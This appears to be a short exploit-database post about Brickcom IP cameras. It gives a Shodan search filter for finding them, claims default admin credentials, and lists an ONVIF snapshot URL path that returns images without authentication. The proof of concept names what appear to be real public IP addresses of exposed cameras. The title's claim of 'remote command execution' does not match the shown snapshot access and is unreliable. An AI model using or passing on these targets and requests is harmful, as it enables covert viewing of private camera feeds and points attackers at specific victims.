# Exploit Title: Exploit Title: Brickcom Camera - Remote command execution # Date: 2/26/2026 # Google Dork : In Shodan search engine, the filter is --> realm="Brickcom" # Exploit Author: parsa rezaie khiabanloo # Tested on: Windows/Linux/Android # 1. Description: All Brickcom versions username and password are admin and they have RCE snapshot without authentication. Exploit : /ONVIF/media.cgi?action=getSnapshot&channel=1 Exploit : ONVIF/media.cgi?action=getSnapshot # 2 . Proof of Concept: Retrieve a camera snapshot without authentication: http://2.81.165.52:5000/ONVIF/media.cgi?action=getSnapshot&channel=1 http://109.89.253.56:10001/ONVIF/media.cgi?action=getSnapshot http://80.123.193.122:10101/ONVIF/media.cgi?action=getSnapshot